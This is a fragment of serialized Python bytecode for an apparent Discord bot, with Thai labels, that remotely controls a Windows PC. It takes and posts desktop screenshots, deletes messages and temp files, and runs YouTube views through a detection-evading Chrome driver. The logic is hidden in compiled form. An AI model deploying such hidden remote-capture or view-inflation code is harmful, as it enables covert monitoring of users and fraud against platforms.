r\xc7\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\xb5\x00\x00\x00r\x0e\x00\x00\x00r\x1c\x01\x00\x00\xf4\x01\x00\x00s\x10\x00\x00\x00\x08\x00\x0c\x01\x14\x01\x18\x01\x14\x0f\x18\x01\x14\x05 \x01r\x1c\x01\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00s\xa0\x00\x00\x00e\x00Z\x01d\x00Z\x02\x87\x00f\x01d\x01d\x02\x84\x08Z\x03e\x04j\x05j\x06d\x03e\x04j\x07j\x08d\x03d\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\x07d\x08\x84\x04\x83\x01Z\x0be\x04j\x05j\x06d\te\x04j\x07j\x08d\td\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\nd\x0b\x84\x04\x83\x01Z\x0ce\x04j\x05j\x06d\x0ce\x04j\x07j\rd\x0cd\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\rd\x0e\x84\x04\x83\x01Z\x0e\x87\x00\x04\x00Z\x0fS\x00)\x0f\xda\tsseleniumc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00r\xd5\x00\x00\x00r\xd6\x00\x00\x00r\xd7\x00\x00\x00r\xb3\x00\x00\x00r\xb5\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00r\xaf\x00\x00\x00\x15\x02\x00\x00r\xf0\x00\x00\x00z\x12sselenium.__init__rI\x00\x00\x00r\xda\x00\x00\x00r\xdb\x00\x00\x00r\xb8\x00\x00\x00c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00sN\x00\x00\x00\x81\x01t\x00d\x017\x00a\x00z\x13|\x02\xa0\x01d\x02\xa1\x01I\x00d\x00H\x00\x01\x00t\x02j\x03t\x04d\x03\x8d\x01\xa0\x05\xa1\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x02\xa0\x01d\x04\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x05Nr\x0f\x00\x00\x00r\xca\x00\x00\x00r\x93\x00\x00\x00r\xcc\x00\x00\x00)\x06r\xbd\x00\x00\x00r!\x00\x00\x00r\x96\x00\x00\x00r\x97\x00\x00\x00r\x8f\x00\x00\x00r\x98\x00\x00\x00r\xde\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\nsselenium1\x16\x02\x00\x00\xf3\x08\x00\x00\x00\x02\x80\x08\x03(\x01\x1c\x01z\x14sselenium.sselenium1z\x0cyoutube viewc\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00sB\x00\x00\x00\x81\x01t\x00d\x017\x00a\x00z\r|\x02j\x01\xa0\x02t\x03\x83\x00\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x02\xa0\x04d\x02\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x03Nr\x0f\x00\x00\x00r\xcc\x00\x00\x00)\x05r\xbd\x00\x00\x00r\x8b\x00\x00\x00r\xeb\x00\x00\x00r\xc9\x00\x00\x00r!\x00\x00\x00r\xde\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\nsselenium2\x1c\x02\x00\x00s\x0c\x00\x00\x00\x02\x80\x08\x03\x02\x01\x1a\x01\x06\x01\x16\x01z\x14sselenium.sselenium2z\rquit seleniumc\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00sF\x00\x00\x00\x81\x01t\x00d\x017\x00a\x00z\x0ft\x01\xa0\x02\xa1\x00\x01\x00|\x02\xa0\x03d\x02\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x02\xa0\x03d\x03\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x04Nr\x0f\x00\x00\x00r\xca\x00\x00\x00r\xcc\x00\x00\x00)\x04r\xbd\x00\x00\x00r\x8a\x00\x00\x00r%\x00\x00\x00r!\x00\x00\x00r\xde\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x0cquitselenium$\x02\x00\x00s\x0e\x00\x00\x00\x02\x80\x08\x03\x02\x02\x08\x01\x16\x01\x06\x01\x16\x01z\x16sselenium.quitselenium)\x10r\xc3\x00\x00\x00r\xc4\x00\x00\x00r\xc5\x00\x00\x00r\xaf\x00\x00\x00r\x1f\x00\x00\x00r\xb0\x00\x00\x00r\xdb\x00\x00\x00r,\x00\x00\x00r-\x00\x00\x00r\xed\x00\x00\x00r\xc6\x00\x00\x00r6\x01\x00\x00r8\x01\x00\x00r.\x00\x00\x00r9\x01\x00\x00r\xc7\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\xb5\x00\x00\x00r\x0e\x00\x00\x00r5\x01\x00\x00\x14\x02\x00\x00s\x10\x00\x00\x00\x08\x00\x0c\x01\x14\x01\x18\x01\x14\x05\x18\x01\x14\x07 \x01r5\x01\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00st\x00\x00\x00e\x00Z\x01d\x00Z\x02\x87\x00f\x01d\x01d\x02\x84\x08Z\x03e\x04j\x05j\x06d\x03e\x04j\x07j\x08d\x03d\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\x07d\x08\x84\x04\x83\x01Z\x0be\x04j\x05j\x06d\te\x04j\x07j\x08d\td\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\nd\x0b\x84\x04\x83\x01Z\x0c\x87\x00\x04\x00Z\rS\x00)\x0c\xda\x03outc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00r\xd5\x00\x00\x00r\xd6\x00\x00\x00r\xd7\x00\x00\x00r\xb3\x00\x00\x00r\xb5\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00r\xaf\x00\x00\x00/\x02\x00\x00r\xf0\x00\x00\x00z\x0cout.__init__z\x12no youube time outr\xda\x00\x00\x00r\xdb\x00\x00\x00r\xb8\x00\x00\x00c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\xc3\x00\x00\x00r\x1d\x01\x00\x00)\nNr\x0f\x00\x00\x00r\xb8\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\xd3\x00\x00\x00sR\x00\x00\x00\x81\x01t\x00d\x017\x00a\x00z\x15d\x02a\x01t\x02j\x03t\x04d\x03\x8d\x01\xa0\x05\xa1\x00\x01\x00|\x00\xa0\x06d\x04\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x00\xa0\x06d\x05\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x06Nr\x0f\x00\x00\x00Tr\x93\x00\x00\x00r\xca\x00\x00\x00r\xcc\x00\x00\x00)\x07r\xbd\x00\x00\x00re\x00\x00\x00r\x96\x00\x00\x00r\x97\x00\x00\x00rl\x00\x00\x00r\x98\x00\x00\x00r!\x00\x00\x00r\xff\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x0bo1_callback4\x02\x00\x00s\x0e\x00\x00\x00\x02\x80\x08\x02\x02\x01\x04\x02\x10\x01\x16\x01\x1c\x01z\x1dout.out1.<locals>.o1_callbackc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\xd3\x00\x00\x00sB\x00\x00\x00\x81\x01t\x00d\x017\x00a\x00z\rd\x02a\x01|\x00\xa0\x02d\x03\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x00\xa0\x02d\x04\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x05Nr\x0f\x00\x00\x00Fr\xca\x00\x00\x00r\xcc\x00\x00\x00)\x03r\xbd\x00\x00\x00re\x00\x00\x00r!\x00\x00\x00r\xff\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x0bo2_callback=\x02\x00\x00s\x0c\x00\x00\x00\x02\x80\x08\x02\x02\x01\x04\x02\x16\x01\x1c\x01z\x1dout.out1.<locals>.o2_callbackuN\x00\x00\x00\xe0\xb8\x81\xe0\xb8\xb2\xe0\xb8\xa3\xe0\xb8\x81\xe0\xb8\x94\xe0\xb8\x9b\xe0\xb8\xb4\xe0\xb8\x94 time out \xe0\xb8\x82\xe0\xb8\xad\xe0\xb8\x87 youube \xe0\xb8\xad\xe0\xb8\xb1\xe0\xb8\x95\xe0\xb9\x82\xe0\xb8\x99\xe0\xb8\xa1\xe0\xb8\xb1\xe0\xb8\x95\xe0\xb8\xb4r\x11\x00\x00\x00r\x06\x01\x00\x00r#\x01\x00\x00)\x06r\xb4\x00\x00\x00r\xdb\x00\x00\x00r\xb8\x00\x00\x00r;\x01\x00\x00r<\x01\x00\x00r\x13\x01\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x04out10\x02\x00\x00s\x14\x00\x00\x00\x02\x80\x08\x03\x10\x01\x10\t\x06\x08\x06\x01\n\x01\n\x01\n\x01 \x01z\x08out.out1z\x19delete windows temp filesc\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00sN\x00\x00\x00\x81\x01t\x00d\x017\x00a\x00z\x13t\x01j\x02t\x03d\x02\x8d\x01\xa0\x04\xa1\x00\x01\x00|\x02\xa0\x05d\x03\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x02\xa0\x05d\x04\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x05Nr\x0f\x00\x00\x00r\x93\x00\x00\x00uA\x00\x00\x00\xe0\xb8\xaa\xe0\xb8\xb3\xe0\xb9\x80\xe0\xb8\xa3\xe0\xb9\x87\xe0\xb8\x88\xe0\xb9\x80\xe0\xb8\x9b\xe0\xb8\xb4\xe0\xb8\x94 Cmd \xe0\xb8\x94\xe0\xb8\xb9 Log \xe0\xb9\x84\xe0\xb8\x94\xe0\xb9\x89\xe0\xb9\x80\xe0\xb8\xa5\xe0\xb8\xa2 r\xcc\x00\x00\x00)\x06r\xbd\x00\x00\x00r\x96\x00\x00\x00r\x97\x00\x00\x00ry\x00\x00\x00r\x98\x00\x00\x00r!\x00\x00\x00r\xde\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x04out2K\x02\x00\x00r7\x01\x00\x00z\x08out.out2)\x0er\xc3\x00\x00\x00r\xc4\x00\x00\x00r\xc5\x00\x00\x00r\xaf\x00\x00\x00r\x1f\x00\x00\x00r\xb0\x00\x00\x00r\xdb\x00\x00\x00r,\x00\x00\x00r\x1b\x01\x00\x00r\xed\x00\x00\x00r\xc6\x00\x00\x00r=\x01\x00\x00r>\x01\x00\x00r\xc7\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\xb5\x00\x00\x00r\x0e\x00\x00\x00r:\x01\x00\x00.\x02\x00\x00s\x0c\x00\x00\x00\x08\x00\x0c\x01\x14\x01\x18\x01\x14\x1a \x01r:\x01\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00s\xa8\x01\x00\x00e\x00Z\x01d\x00Z\x02\x87\x00f\x01d\x01d\x02\x84\x08Z\x03e\x04j\x05j\x06d\x03e\x04j\x07j\x08d\x03d\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\x07d\x08\x84\x04\x83\x01Z\x0be\x04j\x05j\x06d\te\x04j\x07j\x08d\td\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\nd\x0b\x84\x04\x83\x01Z\x0ce\x04j\x05j\x06d\x0ce\x04j\x07j\x08d\x0cd\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\rd\x0e\x84\x04\x83\x01Z\re\x04j\x05j\x06d\x0fe\x04j\x07j\x0ed\x10d\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\x11d\x12\x84\x04\x83\x01Z\x0fe\x04j\x05j\x06d\x13e\x04j\x07j\x10d\x13d\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\x14d\x15\x84\x04\x83\x01Z\x11e\x04j\x05j\x06d\x16e\x04j\x07j\x10d\x16d\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\x17d\x18\x84\x04\x83\x01Z\x12e\x04j\x05j\x06d\x19e\x04j\x07j\x13d\x19d\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\x1ad\x1b\x84\x04\x83\x01Z\x14e\x04j\x05j\x06d\x1ce\x04j\x07j\x0ed\x1cd\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\x1dd\x1e\x84\x04\x83\x01Z\x15e\x04j\x05j\x06d\x1fe\x04j\x07j\x0ed\x1fd\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d d!\x84\x04\x83\x01Z\x16\x87\x00\x04\x00Z\x17S\x00)"\xda\x08mainmanuc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00r\xd5\x00\x00\x00r\xd6\x00\x00\x00r\xd7\x00\x00\x00r\xb3\x00\x00\x00r\xb5\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00r\xaf\x00\x00\x00R\x02\x00\x00r\xf0\x00\x00\x00z\x11mainmanu.__init__z\x08open appr\xda\x00\x00\x00r\xdb\x00\x00\x00r\xb8\x00\x00\x00c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00\xc3\x00\x00\x00\xf3.\x00\x00\x00\x81\x01t\x00d\x017\x00a\x00|\x02j\x01t\x02j\x03d\x02d\x03d\x04\x8d\x02t\x04\x83\x00d\x05\x8d\x02I\x00d\x00H\x00\x01\x00d\x00S\x00)\x06Nr\x0f\x00\x00\x00z\x08App Open\xe9\x00\xff\x04\x00\xa9\x02r\x12\x00\x00\x00Z\x05colorr\x06\x01\x00\x00)\x05r\xbd\x00\x00\x00r!\x00\x00\x00r\x1f\x00\x00\x00r\xbe\x00\x00\x00r\xf9\x00\x00\x00r\xde\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x02m1S\x02\x00\x00\xf3\x04\x00\x00\x00\x02\x80,\x01z\x0bmainmanu.m1\xfa\tMy Systemc\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00\xc3\x00\x00\x00r@\x01\x00\x00)\x06Nr\x0f\x00\x00\x00rE\x01\x00\x00rA\x01\x00\x00rB\x01\x00\x00r\x06\x01\x00\x00)\x05r\xbd\x00\x00\x00r!\x00\x00\x00r\x1f\x00\x00\x00r\xbe\x00\x00\x00r\xef\x00\x00\x00r\xde\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x02m2U\x02\x00\x00rD\x01\x00\x00z\x0bmainmanu.m2\xfa\tclose appc\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00\xc3\x00\x00\x00r@\x01\x00\x00)\x06Nr\x0f\x00\x00\x00rG\x01\x00\x00rA\x01\x00\x00rB\x01\x00\x00r\x06\x01\x00\x00)\x05r\xbd\x00\x00\x00r!\x00\x00\x00r\x1f\x00\x00\x00r\xbe\x00\x00\x00r\xd4\x00\x00\x00r\xde\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x02m3W\x02\x00\x00rD\x01\x00\x00z\x0bmainmanu.m3z\x0bBy Pass Url\xda\x06bypassc\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\xc3\x00\x00\x00s"\x00\x00\x00\x81\x01t\x00d\x017\x00a\x00|\x02j\x01\xa0\x02t\x03\x83\x00\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00)\x02Nr\x0f\x00\x00\x00)\x04r\xbd\x00\x00\x00r\x8b\x00\x00\x00r\xeb\x00\x00\x00r\xa9\x00\x00\x00r\xde\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00rI\x01\x00\x00Y\x02\x00\x00s\x04\x00\x00\x00\x02\x80 \x01z\x0fmainmanu.bypassr:\x01\x00\x00c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00\xc3\x00\x00\x00r@\x01\x00\x00)\x06Nr\x0f\x00\x00\x00r:\x01\x00\x00rA\x01\x00\x00rB\x01\x00\x00r\x06\x01\x00\x00)\x05r\xbd\x00\x00\x00r!\x00\x00\x00r\x1f\x00\x00\x00r\xbe\x00\x00\x00r:\x01\x00\x00r\xde\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x04outf[\x02\x00\x00rD\x01\x00\x00z\rmainmanu.outf\xda\x08seleniumc\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00\xc3\x00\x00\x00r@\x01\x00\x00)\x06Nr\x0f\x00\x00\x00Z\x08SeleniumrA\x01\x00\x00rB\x01\x00\x00r\x06\x01\x00\x00)\x05r\xbd\x00\x00\x00r!\x00\x00\x00r\x1f\x00\x00\x00r\xbe\x00\x00\x00r5\x01\x00\x00r\xde\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x03sim]\x02\x00\x00rD\x01\x00\x00z\x0cmainmanu.sim\xda\nscreenshotc\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\xc3\x00\x00\x00s2\x00\x00\x00\x81\x01t\x00d\x017\x00a\x00t\x01\xa0\x02d\x02\xa1\x01\x01\x00|\x02j\x03t\x04j\x05d\x02d\x03\x8d\x01d\x04\x8d\x01I\x00d\x00H\x00\x01\x00d\x00S\x00)\x05Nr\x0f\x00\x00\x00z\x14./lib/screenshot.png)\x01\xda\x02fp)\x01r\x82\x00\x00\x00)\x06r\xbd\x00\x00\x00rg\x00\x00\x00rM\x01\x00\x00r!\x00\x00\x00r\x1f\x00\x00\x00Z\x04Filer\xde\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x04sim2_\x02\x00\x00s\x04\x00\x00\x00\x02\x800\x01z\rmainmanu.sim2\xda\x08Settingsc\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00\xc3\x00\x00\x00r@\x01\x00\x00)\x06Nr\x0f\x00\x00\x00rP\x01\x00\x00rA\x01\x00\x00rB\x01\x00\x00r\x06\x01\x00\x00)\x05r\xbd\x00\x00\x00r!\x00\x00\x00r\x1f\x00\x00\x00r\xbe\x00\x00\x00r\x1c\x01\x00\x00r\xde\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00rP\x01\x00\x00a\x02\x00\x00rD\x01\x00\x00z\x11mainmanu.Settingsz\x12delete all messagec\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x07\x00\x00\x00\xc3\x00\x00\x00sb\x00\x00\x00\x81\x01t\x00d\x017\x00a\x00t\x01\xa0\x02t\x03\xa1\x01}\x03|\x03j\x04d\x00d\x02\x8d\x012\x00z\r3\x00d\x00H\x00W\x00}\x04|\x04\xa0\x05\xa1\x00I\x00d\x00H\x00\x01\x00q\x106\x00|\x03j\x06t\x07j\x08d\x03d\x04d\x05\x8d\x02t\t\x83\x00d\x06\x8d\x02I\x00d\x00H\x00\x01\x00d\x00S\x00)\x07Nr\x0f\x00\x00\x00r+\x01\x00\x00\xfa\tMain ManurA\x01\x00\x00rB\x01\x00\x00r\x06\x01\x00\x00)\nr\xbd\x00\x00\x00r(\x01\x00\x00r,\x01\x00\x00r-\x01\x00\x00r.\x01\x00\x00r/\x01\x00\x00r!\x00\x00\x00r\x1f\x00\x00\x00r\xbe\x00\x00\x00r?\x01\x00\x00r1\x01\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x06delmegc\x02\x00\x00s\n\x00\x00\x00\x02\x80\x08\x03\n\x01*\x01$\x01z\x0fmainmanu.delmeg)\x18r\xc3\x00\x00\x00r\xc4\x00\x00\x00r\xc5\x00\x00\x00r\xaf\x00\x00\x00r\x1f\x00\x00\x00r\xb0\x00\x00\x00r\xdb\x00\x00\x00r,\x00\x00\x00r\x1b\x01\x00\x00r\xed\x00\x00\x00r\xc6\x00\x00\x00rC\x01\x00\x00rF\x01\x00\x00rH\x01\x00\x00r.\x00\x00\x00rI\x01\x00\x00r-\x00\x00\x00rJ\x01\x00\x00rL\x01\x00\x00r\xee\x00\x00\x00rO\x01\x00\x00rP\x01\x00\x00rR\x01\x00\x00r\xc7\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\xb5\x00\x00\x00r\x0e\x00\x00\x00r?\x01\x00\x00Q\x02\x00\x00s(\x00\x00\x00\x08\x00\x0c\x01\x14\x01\x18\x01\x14\x01\x18\x01\x14\x01\x18\x01\x14\x01\x18\x01\x14\x01\x18\x01\x14\x01\x18\x01\x14\x01\x18\x01\x14\x01\x18\x01\x14\x01 \x01r?\x01\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\xc3\x00\x00\x00s\x08\x01\x00\x00\x81\x01t\x00\xa0\x01t\x02\x83\x00\xa1\x01\x01\x00t\x00\xa0\x01t\x03\x83\x00\xa1\x01\x01\x00t\x00\xa0\x01t\x04\x83\x00\xa1\x01\x01\x00t\x00\xa0\x01t\x05\x83\x00\xa1\x01\x01\x00t\x00\xa0\x01t\x06\x83\x00\xa1\x01\x01\x00t\x00\xa0\x01t\x07\x83\x00\xa1\x01\x01\x00t\x00\xa0\x01t\x08\x83\x00\xa1\x01\x01\x00t\x00\xa0\tt\n\xa1\x01}\x00|\x00j\x0bd\x00d\x01\x8d\x012\x00z\r3\x00d\x00H\x00W\x00}\x01|\x01\xa0\x0c\xa1\x00I\x00d\x00H\x00\x01\x00q66\x00|\x00j\rt\x0ej\x0fd\x02d\x03d\x04\x8d\x02t\x05\x83\x00d\x05\x8d\x02I\x00d\x00H\x00\x01\x00t\x10\xa0\x11\xa1\x00}\x02|\x02\xa0\x12d\x06\xa1\x01}\x03t\x13\xa0\x14\xa1\x00}\x04|\x04\xa0\x12d\x07\xa1\x01}\x05t\x15t\x0ej\x0fd\x08|\x05\x17\x00d\t\x17\x00|\x03\x17\x00d\x03d\x04\x8d\x02d\n\x8d\x01I\x00d\x00H\x00\x01\x00t\x16d\x0bt\x00j\x17\x9b\x00\x9d\x02\x83\x01\x01\x00d\x00S\x00)\x0cNr+\x01\x00\x00rQ\x01\x00\x00rA\x01\x00\x00rB\x01\x00\x00r\x06\x01\x00\x00z\x0b%I:%M:%S %pz\t%B %d, %Yz\topen com z\x03 | r\x1c\x00\x00\x00r\'\x01\x00\x00)\x18r(\x01\x00\x00Z\x08add_viewr\xf9\x00\x00\x00r\xd4\x00\x00\x00r\xef\x00\x00\x00r?\x01\x00\x00r5\x01\x00\x00r\x1c\x01\x00\x00r:\x01\x00\x00r,\x01\x00\x00r-\x01\x00\x00r.\x01\x00\x00r/\x01\x00\x00r!\x00\x00\x00r\x1f\x00\x00\x00r\xbe\x00\x00\x00r\t\x00\x00\x00Z\x03now\xda\x08strftimer\x08\x00\x00\x00\xda\x05todayr&\x00\x00\x00r#\x00\x00\x00r)\x01\x00\x00)\x06r2\x01\x00\x00r3\x01\x00\x00rx\x00\x00\x00r^\x00\x00\x00rT\x01\x00\x00Z\x02d2r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x08on_readyj\x02\x00\x00s&\x00\x00\x00\x02\x80\x0c\x02\x0c\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x01\n\x01\x18\x01\x10\x01\x02\xff \x02\x08\x01\n\x01\x08\x01\n\x01&\x01\x14\x01rU\x01\x00\x00z\x16Config Error Bot Token\xda\x05errorrJ\x00\x00\x00)eZ\x07asynciorS\x00\x00\x00r\xfa\x00\x00\x00\xda\x03sysrT\x00\x00\x00r\x1f\x00\x00\x00Z\x0cnextcord.extr\x02\x00\x00\x00Z\x17undetected_chromedriverr\x84\x00\x00\x00r\x1e\x00\x00\x00r\x9f\x00\x00\x00r\x03\x00\x00\x00rQ\x00\x00\x00r|\x00\x00\x00r2\x00\x00\x00r\x04\x00\x00\x00Z\x07os.pathr\x06\x00\x00\x00r\x07\x00\x00\x00r\t\x00\x00\x00r\x08\x00\x00\x00r\x96\x00\x00\x00ru\x00\x00\x00Z\tpyautoguirg\x00\x00\x00r^\x00\x00\x00r\x87\x00\x00\x00rB\x00\x00\x00rC\x00\x00\x00r\x88\x00\x00\x00rK\x01\x00\x00r\n\x00\x00\x00r}\x00\x00\x00rU\x00\x00\x00Z\x07config1r \x00\x00\x00Z\x05tokenrV\x00\x00\x00r#\x00\x00\x00r$\x00\x00\x00r%\x00\x00\x00r-\x01\x00\x00Z\x10backlstchannelidr;\x00\x00\x00r:\x00\x00\x00r=\x00\x00\x00r0\x01\x00\x00\xda\x04argvZ\x04locar\xbd\x00\x00\x00r\r\x01\x00\x00r\x19\x01\x00\x00Z\x03Botr(\x01\x00\x00r\xbe\x00\x00\x00r\n\x01\x00\x00r\xb0\x00\x00\x00r\xed\x00\x00\x00r,\x00\x00\x00r-\x00\x00\x00r\x0e\x01\x00\x00r\x0f\x01\x00\x00r\x10\x01\x00\x00r\x11\x01\x00\x00r\x08\x01\x00\x00r.\x00\x00\x00r\t\x01\x00\x00r\x1a\x00\x00\x00r&\x00\x00\x00r0\x00\x00\x00rA\x00\x00\x00rK\x00\x00\x00rW\x00\x00\x00ra\x00\x00\x00rl\x00\x00\x00ry\x00\x00\x00rf\x00\x00\x00r\x83\x00\x00\x00r\x8c\x00\x00\x00r\x8f\x00\x00\x00r\x9a\x00\x00\x00r\xa4\x00\x00\x00r\xa7\x00\x00\x00Z\x05Modalr\xa9\x00\x00\x00r\xc9\x00\x00\x00r\xce\x00\x00\x00r\xd2\x00\x00\x00r\x07\x01\x00\x00r\xd4\x00\x00\x00r\xef\x00\x00\x00r\xf9\x00\x00\x00r\x1c\x01\x00\x00r5\x01\x00\x00r:\x01\x00\x00r?\x01\x00\x00Z\x05eventrU\x01\x00\x00\xda\x03runr_\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x08<module>\x01\x00\x00\x00s\xf6\x00\x00\x00\x08\x00\x08\x01\x08\x01\x08\x01\x08\x01\x08\x01\x0c\x01\x08\x01\x08\x01\x0c\x01\x08\x01\x08\x01\x0c\x01\x10\x01\x08\x01\x0c\x01\x0c\x01\x08\x01\x08\x01\x08\x01\x08\x01\x08\x01\x08\x01\x08\x01\x08\x01\x08\x01\x08\x01\x0c\x01\x02\x01\x14\x01\x08\x01\x08\x01\x02\x01\x0c\x01\x06\x01\x08\x01\x06\x01\x08\x01\x02\x01\x08\x01\x08\x01\x0c\x01\x08\x01\x06\x01\x06\x01\x04\x80\x06\x01\x08\x01\x06\x01\x08\x01\x02\x01\x08\x01\x0e\x01\x04\x01\x04\x80\x0c\x01\x04\x80\x06\x01\x08\x01\x06\x01\x08\x01\x02\x01\x04\x02\x04\x01\n\x01\x04\x01\n\x01\x0c\x01\x0c\x01\x14\x01\x14\x01\x14\x01\x14\x01\x14\x01\x18\x01\x06\x01\x08\x01\x06\x01\x08\x01\x08\x01\x08\t\x08\x01\x08\x0b\x08\x07\x08\x08\x08\x05\x08\t\x08\x0b\x08\x0b\x08 \x08\n\x08\x0b\x08\x10\x08\x0c\x08\x0c\x08\x08\x14\x04\x14\x14\x14(\x14\r\x14\x0b\x14<\x14*\x14;\x14 \x14\x1a\x14#\x04\x19\n\x01\x06\x12\x02\x01\x06\x01\x02\x01\x0e\x01\x06\x01\x08\x01\x06\x01\x08\x01\x0c\x01\x08\x01\x04\x80\x1a\x02\x0e\xf4'))
